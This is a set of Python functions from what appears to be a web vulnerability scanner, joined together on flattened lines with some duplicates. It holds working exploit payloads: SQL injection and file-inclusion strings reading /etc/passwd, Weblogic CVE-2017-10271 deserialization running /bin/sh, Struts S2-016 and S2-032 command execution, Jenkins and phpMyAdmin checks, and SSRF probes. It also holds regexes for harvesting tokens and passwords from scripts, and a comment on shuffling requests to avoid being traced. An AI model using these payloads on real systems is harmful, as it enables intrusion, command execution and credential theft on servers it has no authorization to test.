def sqli(qurl): global OUT payload = {"'", "%2527", "')", " AnD 7738=8291"} LFI_payload = { '../../../../etc/passwd|root:', '../../../../etc/group|root:', 'random.php|Failed opening', 'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl) OUT.append(result) raise Getoutofloop for i in LFI_payload: url = '' lfi, pattern = i.split('|') if re.search(r'=\w+\.\w{3}$', qurl): url = re.sub(r'\w+\.\w{3}$', lfi, qurl) elif re.search('=\w+', qurl): url = re.sub(r'\w+$', lfi, qurl) r = requests.get(url, headers=get_ua(), timeout=TIMEOUT) if re.search(pattern, r.text, re.S): OUT.append('LFI: {}'.format(url)) break except: pass
def reverse_domain(host): # 查询旁站 sys.stdout.write(Bcolors.RED + "\nReverse IP Domain Check:\n" + Bcolors.ENDC) if iscdn(host): result = [] data = {"remoteAddress": "{0}".format(host), "key": ""} header = get_ua() try: r = requests.post('https://domains.yougetsignal.com/domains.php', headers=header, data=data, timeout=5, verify=False) text = json.loads(r.text) domain = tldextract.extract(host) for i in text.get('domainArray'): url = i[0] if url != host: if tldextract.extract(url).domain == domain.domain: result.append(url) elif re.search(r'\d+\.\d+\.\d+\.\d+', url): result.append(url) except: try: r = requests.get( 'http://api.hackertarget.com/reverseiplookup/?q={}'.format( host), headers=get_ua(), timeout=4, verify=False) if '<html>' not in r.text and 'No DNS A records found for' not in r.text: text = r.text for _ in text.split('\n'): if _: result.append(_) else: result = [] except: pass if len(result) < 20: if result: for i in result: console('reverse_domain', host, i + '\n') else: console('reverse_domain', host, 'None\n') return result else: console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n') # sys.stdout.write(Bcolors.OKGREEN + 'The maximum number of domain names exceeded (20)\n' + Bcolors.ENDC) return ['The maximum number of domain names exceeded (20)']
def reverse_domain(host): # 查询旁站 if iscdn(host): result = [] data = {"remoteAddress": "{0}".format(host), "key": ""} header = get_ua() header.update({'Referer': 'https://www.yougetsignal.com/tools/web-sites-on-web-server/'}) header.update({'origin': 'https://www.yougetsignal.com'}) try: r = requests.post('https://domains.yougetsignal.com/domains.php', headers=header, data=data, timeout=5) text = json.loads(r.text) domain = tldextract.extract(host) for i in text.get('domainArray'): url = i[0] if url != host: if tldextract.extract(url).domain == domain.domain: result.append(url) elif re.search(r'\d+\.\d+\.\d+\.\d+', url): result.append(url) except: try: r = requests.get('http://api.hackertarget.com/reverseiplookup/?q={}'.format(host), headers=get_ua(), timeout=4) if '<html>' not in r.text: text = r.text for _ in text.split('\n'): if _: result.append(_) else: result = [] except: pass return result
def check404(self, url, text): url = parse.urlparse(url) result = 0 if url.netloc not in self.hosts: key = str(random.random() * 100) random_url = base64.b64encode(key.encode('utf-8')) host = url.scheme + '://' + url.netloc + '/' + random_url.decode( 'utf-8') + '.html' try: r = requests.get(host, timeout=TIMEOUT, verify=False, headers=get_ua(), allow_redirects=False) self.notstr = r.text[:10000] self.notlen = len(r.text) if r.is_redirect: self.goto = r.headers['Location'] self.hosts.append(url.netloc) except Exception as e: logging.exception(e) else: result = difflib.SequenceMatcher(None, self.notstr, text).quick_ratio() return result
def get_js(self, url): if not re.search('http://|https://', url): if '//' in url: url = 'http:' + url else: url = self.host + '/' + url r = requests.get(url, headers=get_ua(), timeout=TIMEOUT, verify=False) regex = ( # 匹配url r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do)\b', # 匹配邮箱 r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', # 匹配token或者密码泄露 # 例如token = xxxxxxxx, 或者"apikey" : "xssss" r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|email|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|api_key|apikey|userid|user_id|user-id)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}"?', # 匹配IP地址 r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b', # 匹配云泄露 r'[\w]+\.cloudfront\.net', r'[\w\-.]+\.appspot\.com', r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*', r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)', r'(storage\.cloud\.google\.com\/[\w\-.]+)', r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)', # 匹配手机号 r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}' # 匹配域名 r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))' ) for _ in regex: text = re.findall(_, r.text, re.M | re.I) if text != None: self.result.extend(text)
def jenkins(url): try: payload = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile" r = requests.get(url + payload, timeout=5, headers=get_ua()) if 'java.lang.NullPointerException' in r.text: return "CVE-2018-1000861 Jenkins_rce url: {}".format(url) except Exception as e: pass
def scan(self, host): try: session = requests.Session() HEADERS = get_ua() HEADERS.update(COOKIE) session.headers.update(HEADERS) r = session.get( host, timeout=TIMEOUT, verify=False, allow_redirects=False, ) if r.is_redirect: goto = r.headers['Location'] else: goto = 'test' # 判断逻辑:1.排除无效状态吗 2.排除无效内容类型 3.判断302跳转 # 4. 判断302跳转不能等于首页 5. 判断内容长度不等于404页面长度 if (r.status_code not in BLOCK_CODE ) and (r.headers['Content-Type'] not in BLOCK_CONTYPE) and ( goto != self.goto) and (parse.urlparse( r.url).netloc not in parse.urlparse(goto).netloc) and ( self.notlen != len(r.text)): text = r.text[:10000] title = re.search('(?<=<title>).*(?=</title>)', text) contype = re.sub('\w+/', '', str(r.headers['Content-Type'])) contype = re.sub(';.*', '', contype) if contype == 'html': result = self.check404(host, text) else: result = 0 if result < 0.8: if title == None: title = 'None' else: title = title.group() title = re.sub(r'\n|\t', '', title) urlresult = parse.urlparse(host) tqdm.tqdm.write(bcolors.OKGREEN + "[+] " + bcolors.ENDC + '{}{:^12}{:^14}\t{:^18}\t{:^8}'.format( r.status_code, len(r.text), title, contype, str(r.url))) data = { urlresult.netloc: { "rsp_code": r.status_code, "rsp_len": len(r.text), "title": title, "contype": contype, "url": urlresult.path } } self.outjson.append(data) except (socket.timeout, requests.exceptions.ConnectionError, requests.exceptions.Timeout): pass except Exception as e: logging.exception(e) return 'OK'
def get_title(url): try: r = requests.get(url, headers=get_ua(), timeout=3, verify=False) r.encoding = "utf-8" html = etree.HTML(r.text) title = html.xpath('//title/text()') return url + ' | ' + title[0] except: pass
def put(url): url = url.strip('/') text = random.randint(100000000, 200000000) payload = '/{}.txt'.format(text) url = url + payload data = {'{}'.format(text): '{}'.format(text)} r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=get_ua()) if r.status_code == 201: return 'HTTP METHOD PUT url: {}'.format(url)
def check(ip, ports, apps): if verify(vuln, ports, apps): try: url = 'http://' + ip url = url + '/solr/' g = requests.get(url, headers=get_ua(), timeout=5, verify=False) if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content: return 'Apache Solr Admin leask' except Exception: pass
def weblogic_ssrf(url): url = url.strip('/') payload = r"/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:27989" url = url + payload r = requests.get(url, allow_redirects=False, verify=False, headers=get_ua()) if 'could not connect over HTTP to server' in r.text: return 'Weblogic SSRF url: {}'.format(url)
def check(ip, ports, apps): if verify(vuln, ports, apps): HEADERS = get_ua() HEADERS.update({'Content-Type': 'text/xml'}) url = 'http://{}:7001/wls-wsat/CoordinatorPortType'.format(ip) data = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/sh</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo xss</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ''' try: r = requests.post(url, data=data, verify=False, timeout=5, headers=get_ua()) text = r.text except Exception: text = "" if '<faultstring>java.lang.ProcessBuilder' in text or "<faultstring>0" in text: return ('CVE-2017-10271 Weglogic RCE {}'.format(url))
def check(ip, ports, apps): try: payload = "/scripts/setup.php" data = 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}' probe = get_list(ip, ports) for url in probe: r = requests.post(url + payload, data=data, timeout=5, headers=get_ua(), verify=False) if r.status_code == '200' and 'root' in r.text: return url + " Phpmyadmin Setup RCE" except Exception as e: pass
def st016(self): payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D" try: r = requests.get(self.url + payload, headers=get_ua(), allow_redirects=False) if str(self.random) in r.headers['Location'] and len( r.headers['Location']) < 15: self.result.append('Apache S2-016 Vulnerability: ' + self.url) except: pass
def st032(self): payload = r"/?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format( self.linux) try: r = requests.get(self.url + payload, headers=get_ua(), timeout=self.timeout) if str(self.random) in r.text and len(r.text) < 11: self.result.append('Apache S2-032 Vulnerability: ' + self.url) except: pass
def check(ip, ports, apps): try: probe = get_list(ip, ports) for url in probe: r = requests.get(url, timeout=3, headers=get_ua(), verify=False) if 'Jenkins' in r.text: result = jenkins(url) except Exception as e: pass if result: return result
def get_title(url): try: r = requests.get(url, headers=get_ua(), timeout=3, verify=False) if r.status_code == 200: coding = chardet.detect(r.content).get('encoding') r.encoding = coding html = etree.HTML(r.text) title = html.xpath('//title/text()') return url + ' | ' + title[0] except: pass
def check(ip, ports, apps): try: probe = get_list(ip, ports) for url in probe: payload = '/uddiexplorer/SearchPublicRegistries.jsp' r = requests.get(url + payload, timeout=3, headers=get_ua()) if 'UDDI Explorer' in r.text: result = weblogic_ssrf(url) except Exception as e: pass if result: return result
def __init__(self, dbname, apps, host, title): self.dbname = dbname self.apps = apps self.title = title self.headers = get_ua() self.outjson = [] self.wordlist = [] self.host = host self.urls = self.get_urls(self.host) self.req = Requests() # url请求随机顺序 避免溯源 random.shuffle(self.urls)
def __init__(self): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings() self.timeout = TIMEOUT self.session = requests.Session() self.headers = get_ua() if COOKIE: self.headers.update(COOKIE) if SOCKS5: ip, port = SOCKS5 socks.set_default_proxy(socks.SOCKS5, ip, port) socket.socket = socks.socksocket
def __init__(self): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings() self.timeout = TIMEOUT self.session = requests.Session() self.headers = get_ua() if COOKIE == 'random': plain = ''.join([random.choice('0123456789') for _ in range(8)]) md5sum = hashlib.md5() md5sum.update(plain.encode('utf-8')) md5 = md5sum.hexdigest() self.headers.update({'Cookie': 'SESSION=' + md5}) else: self.headers.update(COOKIE)
def jsparse(self): out = [] try: r = requests.get(self.host, headers=get_ua(), timeout=TIMEOUT, verify=False) html = etree.HTML(r.text) result = html.xpath('//script/@src') for i in result: if not re.search('jquery|bootstrap|adsbygoogle|javascript|#|vue|react', i): out.append(i) self.pool(list(set(out))) if result: return list(set(self.result)) else: return '' except: return ''
def parse_html(host): urls = [] global links try: exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action', 'do'] r = requests.get(host, headers=get_ua(), timeout=3) tmp = html.document_fromstring(r.text) tmp.make_links_absolute(host) link = tmp.iterlinks() for i in link: i = i[2] ext = parse.urlparse(i)[2].split('.')[-1] if ext in exts: # 带参数的直接加入列表,不带参数的需要二次访问 if re.search('=', i) or re.search('/\?\w+=\w+', i): links.append(i) else: urls.append(i) except: pass return urls
parser.add_argument("-u", "--url", help='Start scanning url -u xxx.com or -u url1,url2') parser.add_argument("-f", "--file", help='read the url from the file') parser.add_argument("-t", "--threads", help='Set scan thread, default 150') parser.add_argument("-e", "--ext", help='Set scan suffix, -e php,asp') parser.add_argument("-i", "--inet", help='cidr eg. 1.1.1.1 or 1.1.1.0/24') parser.add_argument("-w", "--word", help='Read the dict from the file') parser.add_argument("--cookie", help='add a cookies') args = parser.parse_args() dirscan = DirScan(args.word, args.ext) if args.word: SKIP = False if args.cookie: COOKIE = {"Cookie": args.cookie} HEADERS = get_ua() HEADERS.update(COOKIE) if args.inet: _ = [] try: net = list(ipaddress.ip_network(args.inet).hosts()) for i in net: _.append(str(i)) dirscan.pool(_) except Exception as e: print("The task could not be carried out. {}".format(str(e))) if args.threads: try: THREADS = int(args.threads) except: print("Threads must be an int")
def start(url): try: result = 'NoWAF' if (not parse.urlparse(url).path) and (parse.urlparse(url).path != '/'): host = url.replace('http://', '').replace('https://', '').rstrip('/') else: host = url.replace('http://', '').replace('https://', '').rstrip('/') host = re.sub('/\w+', '', host) if ':' in host: host = re.sub(r':\d+', '', host) socket.setdefaulttimeout(1) ipaddr = socket.gethostbyname(host) address = geoip(ipaddr) sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC) sys.stdout.write(bcolors.RED + 'Host: ' + host + '\n' + bcolors.ENDC) sys.stdout.write(bcolors.RED + '-' * 100 + '\n' + bcolors.ENDC) sys.stdout.write(bcolors.RED + "GeoIP:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Address: {}\n'.format(address) + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Ipaddr: {}\n'.format(ipaddr) + bcolors.ENDC) r = requests.get(url, headers=get_ua(), timeout=TIMEOUT, verify=False) except Exception as e: pass sql = '' if 'r' in locals().keys(): try: webinfo = (WebPage(r.url, r.content.decode('utf8'), r.headers).info()) result = checkwaf(r.headers, r.text[:10000]) if result == 'NoWAF': r = requests.get( url + '/index.php?id=1 ' + payload, headers=get_ua(), timeout=TIMEOUT, verify=False) result = checkwaf(r.headers, r.text[:10000]) except Exception as e: webinfo = {} traceback.print_exc() if webinfo: sys.stdout.write(bcolors.RED + "Webinfo:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Title: {}\n'.format(webinfo.get('title')) + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Fingerprint: {}\n'.format(webinfo.get('apps')) + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] Server: {}\n'.format(webinfo.get('server')) + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] WAF: {}\n'.format(result) + bcolors.ENDC) pdns = virustotal(host) reverseip = reverse_domain(host) sys.stdout.write(bcolors.RED + "VT PDNS:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + "\n".join("[+] " + str(i) for i in pdns) + "\n" + bcolors.ENDC) if reverseip: sys.stdout.write(bcolors.RED + "Reverse IP Domain Check:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + "\n".join("[+] " + str(i) for i in reverseip) + "\n" + bcolors.ENDC) jsparse = JsParse(url).jsparse() sql = sql_check(url) webinfo.update({"pdns": pdns}) webinfo.update({"reverseip": reverseip}) else: webinfo = {} jsparse = '' if iscdn(host): open_port = ScanPort(url).pool() else: open_port = ['CDN:0'] sys.stdout.write(bcolors.RED + "PortScan:\n" + bcolors.ENDC) for _ in open_port: sys.stdout.write(bcolors.OKGREEN + '[+] {}\n'.format(_) + bcolors.ENDC) if POC: vuln = Vuln(url, open_port, webinfo.get('apps')).run() else: vuln = [] if jsparse: jsparse = list(map(lambda x: 'Leaks: ' + x, jsparse)) vuln.extend(jsparse) if sql: vuln.extend(sql) vuln = list(filter(None, vuln)) if not (len(vuln) == 1 and ('' in vuln)): sys.stdout.write(bcolors.RED + "Vuln:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + "\n".join("[+] " + str(i) for i in vuln) + "\n" + bcolors.ENDC) url = parse.urlparse(url) osname = osdetect(url.netloc) if not osname: osname = 'None' sys.stdout.write(bcolors.RED + "OS:\n" + bcolors.ENDC) sys.stdout.write(bcolors.OKGREEN + '[+] {}\n'.format(osname) + bcolors.ENDC) data = { url.netloc: { 'WAF': result, 'Ipaddr': ipaddr, 'Address': address, 'Webinfo': webinfo, 'Ports': open_port, 'OS': osname, 'Vuln': vuln } } return data, result